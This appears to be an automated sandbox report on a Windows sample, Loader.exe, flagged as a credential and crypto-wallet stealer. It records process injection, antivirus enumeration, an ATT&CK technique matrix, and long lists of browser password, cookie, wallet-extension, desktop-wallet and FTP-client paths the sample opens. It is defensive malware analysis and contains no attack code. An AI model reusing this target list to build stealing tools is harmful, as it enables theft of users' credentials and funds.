            Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E65200 cpuid 0_2_00E65200
            Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E658C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E658C5
            Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Loader.exe, 00000002.00000003.1840709538.0000000003787000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 3864, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Loader.exe, 00000002.00000003.1730285852.000000000377D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: Loader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: Loader.exeString found in binary or memory: Jaxx Liberty
            Source: Loader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Loader.exe, 00000002.00000003.1813007192.0000000003724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Loader.exe, 00000002.00000003.1812901970.000000000377E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
            Source: Loader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: Loader.exe, 00000002.00000003.1812901970.000000000377E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: Loader.exe, 00000002.00000003.1730285852.000000000377D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: Yara matchFile source: 00000002.00000003.1730285852.000000000377D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 3864, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 3864, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation
            1
            DLL Side-Loading
            211
            Process Injection
            11
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Screen Capture
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            211
            Process Injection
            LSASS Memory141
            Security Software Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager11
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares41
            Data from Local System
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information
            NTDS1
            Process Discovery
            Distributed Component Object Model2
            Clipboard Data
            Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets11
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Loader.exe42%ReversingLabsWin32.Trojan.Generic
            Loader.exe42%VirustotalBrowse
            Loader.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
